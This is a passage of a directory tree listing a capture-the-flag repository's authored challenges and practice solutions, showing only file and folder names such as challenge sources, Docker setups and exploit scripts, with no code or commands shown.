├── MyChallenges ├── Crypto │ └── Cute_Baby_Cats │ │ ├── Desc │ │ ├── distribute │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── share │ │ │ ├── myErrors.py │ │ │ ├── run.sh │ │ │ ├── secret.py │ │ │ ├── server.py │ │ │ └── userClass.py │ │ └── xinetd │ │ └── sol.py ├── Misc │ ├── Excellent_M30W_Store │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── Wishlist.xlsx │ │ │ │ ├── run.sh │ │ │ │ ├── secret.py │ │ │ │ └── server.py │ │ │ └── xinetd │ │ └── sol.py │ └── Matrix │ │ ├── Desc │ │ ├── README.md │ │ ├── distribute │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── share │ │ │ ├── chal.py │ │ │ ├── config.py │ │ │ └── run.sh │ │ └── xinetd │ │ └── solution │ │ └── solve.py ├── Pwn │ ├── ASTRAL │ │ ├── Desc │ │ ├── README.md │ │ ├── distribute │ │ │ ├── Nebula │ │ │ │ └── distribute.diff │ │ │ ├── Neutron │ │ │ │ ├── distribute.diff │ │ │ │ └── share │ │ │ │ │ ├── hypervisor │ │ │ │ │ ├── kernel │ │ │ │ │ └── processor │ │ │ ├── Protostar │ │ │ │ ├── distribute.diff │ │ │ │ └── share │ │ │ │ │ └── processor │ │ │ ├── Redgiant │ │ │ │ ├── distribute.diff │ │ │ │ └── share │ │ │ │ │ ├── hypervisor │ │ │ │ │ └── processor │ │ │ ├── StarryNight │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── init │ │ │ │ ├── share │ │ │ │ │ ├── astralNebula │ │ │ │ │ ├── astralNeutron │ │ │ │ │ ├── astralProtostar │ │ │ │ │ ├── astralRedgiant │ │ │ │ │ ├── astralStarryNight │ │ │ │ │ ├── astralSupernova │ │ │ │ │ ├── hypervisor │ │ │ │ │ ├── kernel │ │ │ │ │ ├── processor │ │ │ │ │ ├── run.sh │ │ │ │ │ └── user │ │ │ │ └── xinetd │ │ │ └── Supernova │ │ │ │ ├── distribute.diff │ │ │ │ └── share │ │ │ │ ├── hypervisor │ │ │ │ ├── processor │ │ │ │ └── user │ │ ├── exploit │ │ │ ├── exploitNebula │ │ │ │ ├── exp_applet.aa │ │ │ │ ├── exp_applet.py │ │ │ │ ├── genNonceTemplate.py │ │ │ │ └── searchNonce.c │ │ │ ├── exploitNeutron │ │ │ │ └── exp_hypervisor.py │ │ │ ├── exploitProtostar │ │ │ │ ├── exp_processor.aa │ │ │ │ └── exp_processor.py │ │ │ ├── exploitRedgiant │ │ │ │ └── exp_user.py │ │ │ ├── exploitStarryNight │ │ │ │ ├── exp_applet.aa │ │ │ │ ├── exp_applet.py │ │ │ │ ├── exp_hypervisor.py │ │ │ │ ├── exp_kernel.py │ │ │ │ ├── exp_processor.aa │ │ │ │ ├── exp_processor.py │ │ │ │ ├── exp_user.aa │ │ │ │ ├── exp_user.py │ │ │ │ ├── genNonceTemplate.py │ │ │ │ └── searchNonce.c │ │ │ └── exploitSupernova │ │ │ │ └── exp_kernel.py │ │ └── sourcecode │ │ │ ├── Nebula │ │ │ └── sourcecode.diff │ │ │ ├── Neutron │ │ │ └── sourcecode.diff │ │ │ ├── Protostar │ │ │ └── sourcecode.diff │ │ │ ├── Redgiant │ │ │ └── sourcecode.diff │ │ │ ├── StarryNight │ │ │ ├── APPLET │ │ │ │ ├── DATASHEET │ │ │ │ ├── SIGNATURES │ │ │ │ ├── assembler.py │ │ │ │ ├── escrow.aa │ │ │ │ ├── escrow.ab │ │ │ │ ├── interpreter.py │ │ │ │ ├── lottery.aa │ │ │ │ └── lottery.ab │ │ │ ├── APPLET_PROCESSOR │ │ │ │ ├── applet.h │ │ │ │ ├── build.sh │ │ │ │ ├── device.c │ │ │ │ ├── device.h │ │ │ │ ├── jit.c │ │ │ │ ├── jit.h │ │ │ │ ├── processor.c │ │ │ │ ├── processor.h │ │ │ │ ├── sandbox.c │ │ │ │ ├── sandbox.h │ │ │ │ ├── snapshot.h │ │ │ │ ├── util.c │ │ │ │ └── util.h │ │ │ ├── HYPERVISOR │ │ │ │ ├── applet.h │ │ │ │ ├── build.sh │ │ │ │ ├── const.h │ │ │ │ ├── device.c │ │ │ │ ├── device.h │ │ │ │ ├── elf.h │ │ │ │ ├── hypercall.c │ │ │ │ ├── hypercall.h │ │ │ │ ├── hypervisor.c │ │ │ │ ├── hypervisor.h │ │ │ │ ├── interrupt.c │ │ │ │ ├── interrupt.h │ │ │ │ ├── util.c │ │ │ │ ├── util.h │ │ │ │ └── vm.h │ │ │ ├── KERNEL │ │ │ │ ├── applet.c │ │ │ │ ├── applet.h │ │ │ │ ├── appletStructs.h │ │ │ │ ├── build.sh │ │ │ │ ├── const.h │ │ │ │ ├── elf.c │ │ │ │ ├── elf.h │ │ │ │ ├── entry.S │ │ │ │ ├── hypercall.c │ │ │ │ ├── hypercall.h │ │ │ │ ├── interruptEntry.S │ │ │ │ ├── kernel.c │ │ │ │ ├── kernel.h │ │ │ │ ├── memory.c │ │ │ │ ├── memory.h │ │ │ │ ├── panic.S │ │ │ │ ├── panic.h │ │ │ │ ├── syscall.S │ │ │ │ ├── syscall.c │ │ │ │ └── syscall.h │ │ │ ├── USER │ │ │ │ ├── applet.h │ │ │ │ ├── build.sh │ │ │ │ ├── entry.S │ │ │ │ ├── lib.c │ │ │ │ ├── lib.h │ │ │ │ ├── syscall.c │ │ │ │ ├── syscall.h │ │ │ │ ├── user.c │ │ │ │ └── user.h │ │ │ └── gensig.py │ │ │ └── Supernova │ │ │ └── sourcecode.diff │ ├── Babyheap │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── babyheap │ │ │ │ ├── flag │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── babyheap.c │ ├── Babynote │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── babynote │ │ │ │ ├── flag │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── babynote.c │ ├── Bookstore │ │ ├── Desc │ │ ├── Dockerfile │ │ ├── bookstore │ │ ├── bookstore.c │ │ ├── exp.py │ │ └── flag │ ├── Childnote │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── childnote │ │ │ │ ├── flag │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── childnote.c │ ├── Cobolstrike │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── archive │ │ │ │ │ └── NOTE │ │ │ │ ├── cobolstrike │ │ │ │ ├── flag │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── cobolstrike.cbl │ ├── Diary │ │ ├── Desc │ │ ├── Diary_writeup.key │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── diary │ │ │ │ ├── flag │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── diary.c │ ├── EDUshell │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── EDUshell │ │ │ │ ├── flag │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── EDUshell.c │ │ │ └── Makefile │ ├── ElfFortress │ │ ├── Desc │ │ ├── distribute │ │ │ ├── DISTNOTE │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── bzImage │ │ │ │ ├── initramfs.cpio │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── sandbox.c │ ├── Formatfree │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── formatfree │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── formatfree.c │ ├── Grocery_Shop │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── grocery_shop │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── grocery_shop.c │ ├── Guardian │ │ ├── Desc │ │ ├── README.md │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── init │ │ │ ├── share │ │ │ │ ├── challenge │ │ │ │ │ ├── Dockerfile │ │ │ │ │ ├── docker-compose.yml │ │ │ │ │ └── share │ │ │ │ │ │ ├── flag │ │ │ │ │ │ ├── guardian.conf │ │ │ │ │ │ ├── ld.so.preload │ │ │ │ │ │ └── libguardian.so │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exploit │ │ │ ├── exp.py │ │ │ └── genlibexp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ ├── guardian.c │ │ │ ├── guardian.h │ │ │ ├── pathlib.c │ │ │ ├── pathlib.h │ │ │ ├── util.c │ │ │ └── util.h │ ├── HelloWorld │ │ ├── Desc │ │ ├── Dockerfile │ │ ├── exp.py │ │ ├── flag │ │ ├── helloworld │ │ └── helloworld.c │ ├── House_of_Cats │ │ ├── Desc │ │ ├── House_of_Cats.key │ │ ├── README.md │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── house_of_cats │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exploit │ │ │ ├── exp.py │ │ │ ├── exp.sh │ │ │ ├── exp_Arch.py │ │ │ ├── exp_complete.py │ │ │ ├── exp_complex.py │ │ │ ├── exp_fast.py │ │ │ ├── exp_final.py │ │ │ └── exp_magic.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ ├── development │ │ │ ├── house_of_cats │ │ │ ├── house_of_cats.c │ │ │ ├── house_of_cats_armoured │ │ │ ├── house_of_cats_noprintf │ │ │ ├── house_of_cats_noprintf.c │ │ │ └── note │ │ │ └── house_of_cats_armoured.c │ ├── Illusion │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── illusion │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ ├── illusion.c │ │ │ └── illusion.py │ ├── Oldnote │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── ld-2.26.so │ │ │ ├── libc-2.26.so │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── oldnote │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── oldnote.c │ ├── Robot │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── robot │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── robot.c │ ├── STACK │ │ ├── Desc │ │ ├── README.md │ │ ├── STACK.key │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── run.sh │ │ │ │ └── stack │ │ │ └── xinetd │ │ ├── exploit │ │ │ ├── exp.py │ │ │ └── exp_fast.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ ├── STACK_armoured.c │ │ │ └── development │ │ │ ├── STACK │ │ │ ├── STACK.c │ │ │ ├── STACK_armoured │ │ │ └── STACK_armoured.c │ ├── Secret_Keeper2 │ │ ├── Desc │ │ ├── Dockerfile │ │ ├── exp.py │ │ ├── flag │ │ ├── secret_keeper_v2 │ │ └── secret_keeper_v2.c │ ├── Sentinel │ │ ├── Desc │ │ ├── README.md │ │ ├── distribute │ │ │ ├── .dockerignore │ │ │ ├── Dockerfile │ │ │ ├── README.md │ │ │ ├── challengeBin │ │ │ │ ├── sentinel │ │ │ │ └── sentinelRevenge │ │ │ ├── challengeFlag │ │ │ │ ├── fakeFlag │ │ │ │ ├── flag │ │ │ │ └── flagRevenge │ │ │ ├── docker-compose.yml │ │ │ ├── init │ │ │ ├── reset.sh │ │ │ ├── share │ │ │ │ ├── instanceManager.py │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ ├── exploit │ │ │ ├── Makefile │ │ │ ├── exp.c │ │ │ └── exp.py │ │ ├── healthcheck.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ ├── sentinel.c │ │ │ └── source.diff │ ├── Survey │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── run.sh │ │ │ │ └── survey │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── survey.c │ ├── TeachingLabs │ │ ├── GOTlab │ │ │ ├── Desc │ │ │ ├── distribute │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ │ ├── GOTlab │ │ │ │ │ ├── flag │ │ │ │ │ └── run.sh │ │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ │ ├── GOTlab.c │ │ │ │ └── Makefile │ │ ├── ROPlab │ │ │ ├── Desc │ │ │ ├── distribute │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ │ ├── ROPlab │ │ │ │ │ ├── flag │ │ │ │ │ └── run.sh │ │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ │ ├── Makefile │ │ │ │ └── ROPlab.c │ │ ├── fastbinlab │ │ │ ├── Desc │ │ │ ├── distribute │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ │ ├── fastbinlab │ │ │ │ │ ├── flag │ │ │ │ │ └── run.sh │ │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ │ ├── Makefile │ │ │ │ └── fastbinlab.c │ │ ├── fmtlab │ │ │ ├── Desc │ │ │ ├── distribute │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ │ ├── flag │ │ │ │ │ ├── fmtlab │ │ │ │ │ └── run.sh │ │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ │ ├── Makefile │ │ │ │ └── fmtlab.c │ │ ├── shelllab │ │ │ ├── Desc │ │ │ ├── distribute │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ │ ├── flag │ │ │ │ │ ├── run.sh │ │ │ │ │ └── shelllab │ │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ │ ├── Makefile │ │ │ │ └── shelllab.c │ │ ├── stashlab │ │ │ ├── Desc │ │ │ ├── distribute │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ │ ├── flag │ │ │ │ │ ├── run.sh │ │ │ │ │ └── stashlab │ │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ │ ├── Makefile │ │ │ │ └── stashlab.c │ │ └── tcachelab │ │ │ ├── Desc │ │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── run.sh │ │ │ │ └── tcachelab │ │ │ └── xinetd │ │ │ ├── exp.py │ │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ └── tcachelab.c │ ├── Treat │ │ ├── Desc │ │ ├── Dockerfile │ │ ├── exp.py │ │ ├── flag │ │ ├── treat │ │ └── treat.c │ ├── Unicorns_Aisle │ │ ├── Desc │ │ ├── README.md │ │ ├── UnicornsAisle.pdf │ │ ├── distribute │ │ │ ├── DISTNOTE │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── libunicorn.so.1 │ │ │ ├── share │ │ │ │ ├── encounter.emu │ │ │ │ ├── run.sh │ │ │ │ ├── unicornInterlude │ │ │ │ ├── unicornPostlude │ │ │ │ ├── unicornPrelude │ │ │ │ └── unicornsAisle │ │ │ └── xinetd │ │ ├── exp_postlude.py │ │ └── sourcecode │ │ │ └── Server │ │ │ ├── build.sh │ │ │ ├── encounter.S │ │ │ ├── guestcontext.h │ │ │ ├── handler.c │ │ │ ├── handler.h │ │ │ ├── main.c │ │ │ ├── main.h │ │ │ ├── mem.c │ │ │ ├── mem.h │ │ │ ├── run.sh │ │ │ ├── ucutils.c │ │ │ ├── ucutils.h │ │ │ ├── utils.c │ │ │ └── utils.h │ ├── Variable_Machine_Revenge │ │ ├── Desc │ │ ├── distribute │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ │ ├── flag │ │ │ │ ├── run.sh │ │ │ │ └── variable_machine_revenge │ │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ │ ├── Makefile │ │ │ ├── includes │ │ │ ├── gc.h │ │ │ ├── variables.h │ │ │ └── vm.h │ │ │ ├── source.diff │ │ │ └── src │ │ │ ├── Makefile │ │ │ ├── gc.c │ │ │ ├── main.c │ │ │ └── vm.c │ └── Wheel_of_Fortune │ │ ├── Desc │ │ ├── distribute │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── share │ │ │ ├── flag │ │ │ ├── run.sh │ │ │ └── wheel_of_fortune │ │ └── xinetd │ │ ├── exp.py │ │ └── sourcecode │ │ ├── Makefile │ │ └── wheel_of_fortune.c └── SmartContract │ └── Draupnir │ ├── Desc │ ├── Draupnir.pdf │ ├── README.md │ ├── contracts │ ├── Setup.sol │ └── weth9.sol │ ├── distribute │ ├── Dockerfile │ ├── docker-compose.yml │ ├── requirements.txt │ └── share │ │ ├── chal.py │ │ ├── compiled.bin │ │ ├── entrypoint.sh │ │ ├── eth_sandbox │ │ ├── __init__.py │ │ ├── auth.py │ │ ├── launcher.py │ │ └── server.py │ │ ├── handler.sh │ │ └── startup │ │ ├── 00-create-xinetd-service │ │ ├── 98-start-gunicorn │ │ └── 99-start-xinetd │ └── solution │ ├── exp.py │ ├── exp.sh │ └── exp.sol ├── Practice ├── CTFS.me │ ├── binary_exploitation │ │ ├── faile.py │ │ ├── namelist.py │ │ ├── obstacle.py │ │ ├── secret.py │ │ ├── soeltanbank.py │ │ ├── story.py │ │ └── thoughtfuldecision.py │ ├── cryptography │ │ └── as_beautiful_as_ruby.py │ ├── reverse │ │ ├── balikin.py │ │ ├── privateroom.py │ │ ├── rennai.py │ │ ├── resqua.py │ │ ├── reverseme1.py │ │ ├── reverseme1.txt │ │ └── rvrsmz64.py │ └── web_exploitation │ │ ├── Baby_RCE_1.txt │ │ ├── Baby_RCE_2.txt │ │ └── Blue_Eyes_White_Dragon.txt ├── Eonew.cn │ ├── Black_Hole │ │ ├── black_hole │ │ └── exp.py │ ├── Blockade │ │ ├── blockade │ │ └── exp.py │ ├── Car_Store │ │ ├── car_store │ │ ├── car_store.cpp │ │ └── exp.py │ ├── Easy_ASAN │ │ ├── easy_asan │ │ └── exp.py │ ├── Easy_Printf │ │ ├── easy_printf │ │ └── exp.py │ ├── Easy_Stack │ │ ├── easy_stack │ │ └── exp.py │ ├── Fog │ │ ├── exp.py │ │ └── fog │ ├── HTTP_Server │ │ ├── exp.py │ │ └── server │ ├── House_of_Storm │ │ ├── exp.py │ │ └── house_of_storm │ ├── Kernel_Pwn1 │ │ ├── exp.c │ │ └── test1.ko │ ├── Kernel_Pwn2 │ │ ├── exp.c │ │ └── test2.ko │ ├── Link_List │ │ ├── exp.py │ │ └── link_list │ ├── Login │ │ ├── exp.py │ │ └── login │ ├── Mimic_Heap │ │ ├── exp.py │ │ ├── mimic │ │ └── mimic_heap │ ├── Mimic_Stack │ │ ├── mimic │ │ ├── mimic_stack_x64 │ │ └── mimic_stack_x86 │ ├── Mountain │ │ ├── exp.py │ │ └── mountain │ ├── No_Leak │ │ ├── exp.py │ │ └── no_leak │ ├── Shellcode │ │ ├── exp.py │ │ └── shellcode │ ├── Squid │ │ └── exp.py │ ├── Time_Heap │ │ ├── exp.py │ │ └── time_heap │ └── Truncate_String │ │ ├── exp.py │ │ └── truncate_string ├── MicroCorruption │ ├── Challenge_ROMS │ │ ├── Addis_Ababa.zip │ │ ├── Algiers.zip │ │ ├── Bangalore.zip │ │ ├── Chernobyl.zip │ │ ├── Cusco.zip │ │ ├── Hanoi.zip │ │ ├── Hollywood.zip │ │ ├── Jakarta.zip │ │ ├── Johannesburg.zip │ │ ├── Lagos.zip │ │ ├── Montevideo.zip │ │ ├── New_Orleans.zip │ │ ├── Novosibirsk.zip │ │ ├── Reykjavik.zip │ │ ├── Santa_Cruz.zip │ │ ├── Sydney.zip │ │ ├── Tutorial.zip │ │ ├── Vladivostok.zip │ │ └── Whitehorse.zip │ ├── LockITProManual.pdf │ ├── MSP430Reference.pdf │ └── Solutions ├── Pwnable.kr │ ├── Grotesque │ │ ├── cmd3 │ │ └── coin2 │ │ │ ├── coin2 │ │ │ └── exp.py │ ├── Rookie │ │ ├── alloca │ │ │ ├── alloca │ │ │ └── exp.py │ │ ├── ascii_easy │ │ │ ├── ascii_easy │ │ │ └── exp.py │ │ ├── brain_fuck │ │ │ ├── bf │ │ │ └── exp.py │ │ ├── crypto1 │ │ │ ├── client.py │ │ │ ├── exp.py │ │ │ └── server.py │ │ ├── dragon │ │ │ ├── dragon │ │ │ └── exp.py │ │ ├── echo1 │ │ │ ├── echo1 │ │ │ └── exp.py │ │ ├── echo2 │ │ │ ├── echo2 │ │ │ └── exp.py │ │ ├── fix │ │ │ ├── exp.py │ │ │ └── fix │ │ ├── fsb │ │ │ ├── exp.py │ │ │ └── fsb │ │ ├── loveletter │ │ │ ├── exp.py │ │ │ └── loveletter │ │ ├── md5_calculator │ │ │ ├── exp.py │ │ │ ├── genrand.c │ │ │ └── md5_calculator │ │ ├── note │ │ │ ├── exp.py │ │ │ └── note │ │ ├── otp │ │ │ ├── exp │ │ │ └── otp.c │ │ ├── rsa_calculator │ │ │ ├── exp.py │ │ │ └── rsa_calculator │ │ ├── simple_login │ │ │ ├── exp.py │ │ │ └── simple_login │ │ ├── syscall │ │ │ ├── exp.c │ │ │ └── syscall.c │ │ └── tiny_easy │ │ │ ├── exp.py │ │ │ └── tiny_easy │ ├── Secret │ │ ├── Exploitable │ │ │ ├── exp.py │ │ │ └── exploitable │ │ ├── Malware │ │ │ ├── exp.py │ │ │ └── malware.py │ │ └── Unexploitable │ │ │ ├── exp.py │ │ │ └── unexploitable │ └── Toddler │ │ ├── asm │ │ ├── asm.c │ │ └── exp.py │ │ ├── blackjack │ │ ├── blackjack.c │ │ └── exp │ │ ├── blukat │ │ ├── bof │ │ ├── bof │ │ └── exp.py │ │ ├── cmd1 │ │ ├── cmd1.c │ │ └── exp │ │ ├── cmd2 │ │ ├── cmd2.c │ │ └── exp │ │ ├── coin │ │ ├── coin │ │ └── exp.py │ │ ├── collision │ │ ├── collision.c │ │ └── exp │ │ ├── fd │ │ ├── exp │ │ └── fd.c │ │ ├── flag │ │ ├── exp │ │ └── flag │ │ ├── horcruxes │ │ ├── exp.py │ │ └── horcruxes │ │ ├── input │ │ ├── exp.c │ │ └── input.c │ │ ├── leg │ │ ├── exp │ │ └── leg.asm │ │ ├── lotto │ │ ├── exp │ │ └── lotto.c │ │ ├── memcpy │ │ ├── exp │ │ └── memcpy.c │ │ ├── mistake │ │ ├── exp │ │ └── mistake.c │ │ ├── passcode │ │ ├── exp │ │ └── passcode │ │ ├── random │ │ ├── exp │ │ └── random.c │ │ ├── shellshock │ │ ├── exp │ │ └── shellshock.c │ │ ├── uaf │ │ ├── exp │ │ └── uaf │ │ └── unlink │ │ ├── exp.py │ │ └── unlink ├── Pwnable.tw │ ├── 3x17 │ │ ├── 3x17 │ │ └── exp.py │ ├── alive_note │ │ ├── alive_note │ │ └── exp.py │ ├── applestore │ │ ├── applestore │ │ └── exp.py │ ├── babyallocator │ │ ├── babyallocator │ │ ├── exp.py │ │ └── exp_makes_sense.py │ ├── babystack │ │ ├── babystack │ │ └── exp.py │ ├── bash │ │ ├── bash │ │ │ └── exp.py │ │ ├── bash_revenge │ │ │ └── exp.py │ │ └── prob │ │ │ └── bash_revenge.tgz │ ├── bookwriter │ │ ├── bookwriter │ │ └── exp.py │ ├── bounty_program_alpha │ │ ├── bounty_program │ │ ├── exp.py │ │ └── wrapper │ ├── bounty_program_beta │ │ ├── bounty_program │ │ ├── exp.py │ │ └── wrapper │ ├── breakout │ │ ├── breakout │ │ ├── exp.py │ │ └── prisoner │ ├── calc │ │ ├── calc │ │ └── exp.py │ ├── caov │ │ ├── caov │ │ ├── caov.cpp │ │ └── exp.py │ ├── critical_heap │ │ ├── critical_heap++ │ │ │ ├── exp.py │ │ │ └── leakenv.py │ │ ├── critical_heap │ │ │ └── exp.py │ │ └── prob │ │ │ └── critical_heap │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ ├── critical_heap │ │ │ └── run.sh │ │ │ └── xinetd │ ├── deaslr │ │ ├── deaslr │ │ └── exp.py │ ├── death_note │ │ ├── death_note │ │ └── exp.py │ ├── digimon │ │ ├── digimon │ │ ├── exp.py │ │ └── img │ │ │ ├── 50216mon │ │ │ ├── Agumon │ │ │ ├── Angemon │ │ │ ├── Angewomon │ │ │ ├── Angrymon │ │ │ ├── Armadillomon │ │ │ ├── Birdramon │ │ │ ├── Devimon │ │ │ ├── Digitamamon │ │ │ ├── Etemon │ │ │ ├── Gabumon │ │ │ ├── Garudamon │ │ │ ├── Garurumon │ │ │ ├── Gatomon │ │ │ ├── Gomamon │ │ │ ├── Greymon │ │ │ ├── Hawkmon │ │ │ ├── HerakleKabuterimon │ │ │ ├── Hououmon │ │ │ ├── Ikkakumon │ │ │ ├── Impmon │ │ │ ├── Kabuterimon │ │ │ ├── Kuwagamon │ │ │ ├── Leomon │ │ │ ├── Lillymon │ │ │ ├── Lopmon │ │ │ ├── MagnaAngemon │ │ │ ├── Magnadramon │ │ │ ├── MegaKabuterimon │ │ │ ├── Meramon │ │ │ ├── MetalGarurumon │ │ │ ├── MetalGreymon │ │ │ ├── Meteormon │ │ │ ├── Monzaemon │ │ │ ├── Myotismon │ │ │ ├── Numemon │ │ │ ├── Orangemon │ │ │ ├── Palmon │ │ │ ├── Patamon │ │ │ ├── Piximon │ │ │ ├── Piyomon │ │ │ ├── Plesiomon │ │ │ ├── Renamon │ │ │ ├── Rosemon │ │ │ ├── Seadramon │ │ │ ├── Seraphimon │ │ │ ├── SkullGreymon │ │ │ ├── Starmon │ │ │ ├── Tentomon │ │ │ ├── Terriermon │ │ │ ├── Togemon │ │ │ ├── Toolmon │ │ │ ├── Veemon │ │ │ ├── WarGreymon │ │ │ ├── WereGarurumon │ │ │ ├── Whamon │ │ │ ├── Woodmon │ │ │ ├── Wormmon │ │ │ └── Zudomon │ ├── dubblesort │ │ ├── dubblesort │ │ └── exp.py │ ├── food_store │ │ ├── exp.py │ │ └── food_store │ ├── ghostparty │ │ ├── exp.py │ │ ├── ghostparty │ │ └── ghostparty.cpp │ ├── hacknote │ │ ├── exp.py │ │ └── hacknote │ ├── heap_paradise │ │ ├── exp.py │ │ └── heap_paradise │ ├── kidding │ │ ├── exp.py │ │ └── kidding │ ├── mno2 │ │ ├── exp.py │ │ └── mno2 │ ├── omegago │ │ ├── exp.py │ │ └── omegago │ ├── orw │ │ ├── exp.py │ │ └── orw │ ├── printable │ │ ├── exp.py │ │ └── printable │ ├── re-alloc │ │ ├── exp.py │ │ └── re-alloc │ ├── re-alloc_revenge │ │ ├── exp.py │ │ └── re-alloc_revenge │ ├── seccomp_tools │ │ ├── allow_orw.bpf │ │ ├── exp.py │ │ ├── forbid_execve.bpf │ │ ├── kill_all.bpf │ │ └── seccomp-tools │ ├── secret_of_my_heart │ │ ├── exp.py │ │ └── secret_of_my_heart │ ├── secretgarden │ │ ├── exp.py │ │ └── secretgarden │ ├── seethefile │ │ ├── exp.py │ │ └── seethefile │ ├── silver_bullet │ │ ├── exp.py │ │ └── silver_bullet │ ├── spirited_away │ │ ├── exp.py │ │ └── spirited_away │ ├── starbound │ │ ├── exp.py │ │ └── starbound │ ├── start │ │ ├── exp.py │ │ └── start │ ├── stupid_boss │ │ ├── exp.py │ │ └── stupid │ ├── tcache_tear │ │ ├── exp.py │ │ └── tcache_tear │ ├── unexploitable │ │ ├── exp.py 